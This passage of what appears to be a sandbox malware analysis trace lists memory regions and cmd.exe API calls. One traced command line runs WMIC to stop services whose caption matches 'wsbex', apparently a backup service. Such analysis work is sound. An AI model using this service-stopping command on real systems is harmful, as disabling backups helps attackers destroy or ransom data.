0x7f4eefff entry_point = 0x0 region_type = private name = "private_0x000000007f4ec000" filename = "" Region: id = 2097 start_va = 0x7f4ef000 end_va = 0x7f4effff entry_point = 0x0 region_type = private name = "private_0x000000007f4ef000" filename = "" Region: id = 2098 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2099 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2100 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 2101 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2102 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 2103 start_va = 0x5260000 end_va = 0x526ffff entry_point = 0x0 region_type = private name = "private_0x0000000005260000" filename = "" Region: id = 2104 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2105 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2106 start_va = 0x5320000 end_va = 0x541ffff entry_point = 0x0 region_type = private name = "private_0x0000000005320000" filename = "" Region: id = 2107 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2148 start_va = 0x4fb0000 end_va = 0x4fbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004fb0000" filename = "" Region: id = 2149 start_va = 0x5170000 end_va = 0x522dfff entry_point = 0x5170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2150 start_va = 0x5270000 end_va = 0x52affff entry_point = 0x0 region_type = private name = "private_0x0000000005270000" filename = "" Region: id = 2151 start_va = 0x5420000 end_va = 0x551ffff entry_point = 0x0 region_type = private name = "private_0x0000000005420000" filename = "" Region: id = 2152 start_va = 0x5630000 end_va = 0x563ffff entry_point = 0x0 region_type = private name = "private_0x0000000005630000" filename = "" Region: id = 2153 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2154 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2155 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2156 start_va = 0x7f3c0000 end_va = 0x7f4bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f3c0000" filename = "" Region: id = 2157 start_va = 0x7f4e6000 end_va = 0x7f4e8fff entry_point = 0x0 region_type = private name = "private_0x000000007f4e6000" filename = "" Region: id = 2158 start_va = 0x4fc0000 end_va = 0x4fc3fff entry_point = 0x0 region_type = private name = "private_0x0000000004fc0000" filename = "" Region: id = 2159 start_va = 0x4fd0000 end_va = 0x4fd3fff entry_point = 0x0 region_type = private name = "private_0x0000000004fd0000" filename = "" Region: id = 2160 start_va = 0x5640000 end_va = 0x5976fff entry_point = 0x5640000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 171 os_tid = 0xd14 [0106.678] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0106.678] __set_app_type (_Type=0x1) [0106.678] __p__fmode () returned 0x77ac4d6c [0106.678] __p__commode () returned 0x77ac5b1c [0106.679] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0106.679] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0106.679] GetCurrentThreadId () returned 0xd14 [0106.679] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd14) returned 0x84 [0106.679] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0106.679] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0106.679] SetThreadUILanguage (LangId=0x0) returned 0x409 [0106.681] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0106.681] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x513fcfc | out: phkResult=0x513fcfc*=0x0) returned 0x2 [0106.682] VirtualQuery (in: lpAddress=0x513fd03, lpBuffer=0x513fcb4, dwLength=0x1c | out: lpBuffer=0x513fcb4*(BaseAddress=0x513f000, AllocationBase=0x5040000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0106.682] VirtualQuery (in: lpAddress=0x5040000, lpBuffer=0x513fcb4, dwLength=0x1c | out: lpBuffer=0x513fcb4*(BaseAddress=0x5040000, AllocationBase=0x5040000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0106.682] VirtualQuery (in: lpAddress=0x5041000, lpBuffer=0x513fcb4, dwLength=0x1c | out: lpBuffer=0x513fcb4*(BaseAddress=0x5041000, AllocationBase=0x5040000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0106.682] VirtualQuery (in: lpAddress=0x5043000, lpBuffer=0x513fcb4, dwLength=0x1c | out: lpBuffer=0x513fcb4*(BaseAddress=0x5043000, AllocationBase=0x5040000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0106.682] VirtualQuery (in: lpAddress=0x5140000, lpBuffer=0x513fcb4, dwLength=0x1c | out: lpBuffer=0x513fcb4*(BaseAddress=0x5140000, AllocationBase=0x5140000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0106.682] GetConsoleOutputCP () returned 0x1b5 [0106.682] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0106.682] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0106.682] _get_osfhandle (_FileHandle=1) returned 0x3c [0106.682] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0106.682] _get_osfhandle (_FileHandle=1) returned 0x3c [0106.682] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0106.682] _get_osfhandle (_FileHandle=1) returned 0x3c [0106.682] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0106.683] _get_osfhandle (_FileHandle=0) returned 0x38 [0106.683] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0106.683] _get_osfhandle (_FileHandle=0) returned 0x38 [0106.683] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0106.683] GetEnvironmentStringsW () returned 0x5327dd0* [0106.683] FreeEnvironmentStringsA (penv="A") returned 1 [0106.683] GetEnvironmentStringsW () returned 0x5327dd0* [0106.683] FreeEnvironmentStringsA (penv="A") returned 1 [0106.683] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x513ec60 | out: phkResult=0x513ec60*=0x94) returned 0x0 [0106.683] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x513ec64, lpData=0x513ec6c, lpcbData=0x513ec68*=0x1000 | out: lpType=0x513ec64*=0x0, lpData=0x513ec6c*=0xa8, lpcbData=0x513ec68*=0x1000) returned 0x2 [0106.683] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x513ec64, lpData=0x513ec6c, lpcbData=0x513ec68*=0x1000 | out: lpType=0x513ec64*=0x4, lpData=0x513ec6c*=0x1, lpcbData=0x513ec68*=0x4) returned 0x0 [0106.683] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x513ec64, lpData=0x513ec6c, lpcbData=0x513ec68*=0x1000 | out: lpType=0x513ec64*=0x0, lpData=0x513ec6c*=0x1, lpcbData=0x513ec68*=0x1000) returned 0x2 [0106.684] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x513ec64, lpData=0x513ec6c, lpcbData=0x513ec68*=0x1000 | out: lpType=0x513ec64*=0x4, lpData=0x513ec6c*=0x0, lpcbData=0x513ec68*=0x4) returned 0x0 [0106.684] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x513ec64, lpData=0x513ec6c, lpcbData=0x513ec68*=0x1000 | out: lpType=0x513ec64*=0x4, lpData=0x513ec6c*=0x40, lpcbData=0x513ec68*=0x4) returned 0x0 [0106.684] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x513ec64, lpData=0x513ec6c, lpcbData=0x513ec68*=0x1000 | out: lpType=0x513ec64*=0x4, lpData=0x513ec6c*=0x40, lpcbData=0x513ec68*=0x4) returned 0x0 [0106.684] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x513ec64, lpData=0x513ec6c, lpcbData=0x513ec68*=0x1000 | out: lpType=0x513ec64*=0x0, lpData=0x513ec6c*=0x40, lpcbData=0x513ec68*=0x1000) returned 0x2 [0106.684] RegCloseKey (hKey=0x94) returned 0x0 [0106.684] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x513ec60 | out: phkResult=0x513ec60*=0x94) returned 0x0 [0106.684] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x513ec64, lpData=0x513ec6c, lpcbData=0x513ec68*=0x1000 | out: lpType=0x513ec64*=0x0, lpData=0x513ec6c*=0x40, lpcbData=0x513ec68*=0x1000) returned 0x2 [0106.684] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x513ec64, lpData=0x513ec6c, lpcbData=0x513ec68*=0x1000 | out: lpType=0x513ec64*=0x4, lpData=0x513ec6c*=0x1, lpcbData=0x513ec68*=0x4) returned 0x0 [0106.684] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x513ec64, lpData=0x513ec6c, lpcbData=0x513ec68*=0x1000 | out: lpType=0x513ec64*=0x0, lpData=0x513ec6c*=0x1, lpcbData=0x513ec68*=0x1000) returned 0x2 [0106.684] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x513ec64, lpData=0x513ec6c, lpcbData=0x513ec68*=0x1000 | out: lpType=0x513ec64*=0x4, lpData=0x513ec6c*=0x0, lpcbData=0x513ec68*=0x4) returned 0x0 [0106.684] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x513ec64, lpData=0x513ec6c, lpcbData=0x513ec68*=0x1000 | out: lpType=0x513ec64*=0x4, lpData=0x513ec6c*=0x9, lpcbData=0x513ec68*=0x4) returned 0x0 [0106.684] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x513ec64, lpData=0x513ec6c, lpcbData=0x513ec68*=0x1000 | out: lpType=0x513ec64*=0x4, lpData=0x513ec6c*=0x9, lpcbData=0x513ec68*=0x4) returned 0x0 [0106.684] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x513ec64, lpData=0x513ec6c, lpcbData=0x513ec68*=0x1000 | out: lpType=0x513ec64*=0x0, lpData=0x513ec6c*=0x9, lpcbData=0x513ec68*=0x1000) returned 0x2 [0106.684] RegCloseKey (hKey=0x94) returned 0x0 [0106.684] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2981b [0106.684] srand (_Seed=0x5ad2981b) [0106.684] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%wsbex%'' CALL STOPSERVICE" [0106.684] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%wsbex%'' CALL STOPSERVICE" [0106.684] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0106.684] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5329d28, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0106.684] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0106.684] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0106.684] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0106.684] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0106.684] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0106.684] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0106.684] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0106.684] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0106.684] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0106.684] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0106.684] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0106.685] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0106.685] GetEnvironmentStringsW () returned 0x5327dd0* [0106.685] FreeEnvironmentStringsA (penv="A") returned 1 [0106.685] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0106.685] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0106.685] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0106.685] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0106.685] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0106.685] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0106.685] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0106.685] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0106.685] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0106.685] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0106.685] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x513fa38 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0106.685] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x513fa38, lpFilePart=0x513fa30 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x513fa30*="Desktop") returned 0x1d [0106.685] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0106.685] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x513f7b8 | out: lpFindFileData=0x513f7b8) returned 0x53205c8 [0106.685] FindClose (in: hFindFile=0x53205c8 | out: hFindFile=0x53205c8) returned 1 [0106.685] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x513f7b8 | out: lpFindFileData=0x513f7b8) returned 0x53205c8 [0106.686] FindClose (in: hFindFile=0x53205c8 | out: hFindFile=0x53205c8) returned 1 [0106.686] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0106.686] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x513f7b8 | out: lpFindFileData=0x513f7b8) returned 0x53205c8 [0106.686] FindClose (in: hFindFile=0x53205c8 | out: hFindFile=0x53205c8) returned 1 [0106.686] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0106.686] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0106.686] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0106.686] GetEnvironmentStringsW () returned 0x5327dd0* [0106.686] FreeEnvironmentStringsA (penv="=") returned 1 [0106.686] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0106.686] GetConsoleOutputCP () returned 0x1b5 [0106.686] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0106.687] GetUserDefaultLCID () returned 0x409 [0106.687] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0106.687] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x513fb68, cchData=128 | out: lpLCData="0") returned 2 [0106.687] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x513fb68, cchData=128 | out: lpLCData="0") returned 2 [0106.687] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x513fb68, cchData=128 | out: lpLCData="1") returned 2 [0106.687] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0106.687] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0106.687] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0106.687] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0106.687] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0106.687] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0106.687] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0106.687] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0106.687] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0106.687] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0106.687] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0106.688] GetConsoleTitleW (in: lpConsoleTitle=0x532aa98, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0106.688] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0106.688] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0106.688] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0106.688] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0106.688] GetEnvironmentVariableW (in: lpName="wsbex", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0106.688] _wcsicmp (_String1="wsbex", _String2="CD") returned 20 [0106.688] _wcsicmp (_String1="wsbex", _String2="ERRORLEVEL") returned 18 [0106.688] _wcsicmp (_String1="wsbex", _String2="CMDEXTVERSION") returned 20 [0106.689] _wcsicmp (_String1="wsbex", _String2="CMDCMDLINE") returned 20 [0106.689] _wcsicmp (_String1="wsbex", _String2="DATE") returned 19 [0106.689] _wcsicmp (_String1="wsbex", _String2="TIME") returned 3 [0106.689] _wcsicmp (_String1="wsbex", _String2="RANDOM") returned 5 [0106.689] _wcsicmp (_String1="wsbex", _String2="HIGHESTNUMANODENUMBER") returned 15 [0106.689] _wcsicmp (_String1="WMIC", _String2=")") returned 78 [0106.689] _wcsicmp (_String1="FOR", _String2="WMIC") returned -17 [0106.689] _wcsicmp (_String1="FOR/?", _String2="WMIC") returned -17 [0106.689] _wcsicmp (_String1="IF", _String2="WMIC") returned -14 [0106.689] _wcsicmp (_String1="IF/?", _String2="WMIC") returned -14 [0106.689] _wcsicmp (_String1="REM", _String2="WMIC") returned -5 [0106.689] _wcsicmp (_String1="REM/?", _String2="WMIC") returned -5 [0106.690] GetConsoleTitleW (in: lpConsoleTitle=0x513f850, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0106.691] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0106.691] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0106.691] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0106.691] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0106.691] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0106.691] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0106.691] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0106.691] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0106.691] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0106.691] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0106.691] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0106.691] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0106.691] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0106.691] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0106.691] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0106.691] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0106.691] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0106.691] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0106.691] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0106.691] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0106.691] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0106.691] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0106.691] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0106.691] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0106.691] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0106.691] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0106.691] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0106.691] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0106.691] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0106.691] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0106.691] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0106.691] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0106.691] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0106.691] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0106.691] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0106.691] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0106.691] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0106.691] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0106.691] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0106.691] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0106.691] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0106.692] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0106.692] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0106.692] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0106.692] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0106.692] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0106.692] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0106.692] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0106.692] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0106.692] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0106.692] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0106.692] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0106.692] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0106.692] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0106.692] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0106.692] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0106.692] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0106.692] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0106.692] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0106.692] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0106.692] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0106.692] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0106.692] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0106.692] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0106.692] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0106.692] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0106.692] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0106.692] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0106.692] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0106.692] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0106.692] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0106.692] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0106.692] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0106.692] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0106.692] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0106.692] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0106.692] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0106.692] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0106.692] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0106.692] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0106.692] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0106.692] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0106.692] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0106.692] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0106.692] _wcsicmp (_String1="WMIC", _String2="FOR") returned 17 [0106.692] _wcsicmp (_String1="WMIC", _String2="IF") returned 14 [0106.692] _wcsicmp (_String1="WMIC", _String2="REM") returned 5 [0106.692] _wcsnicmp 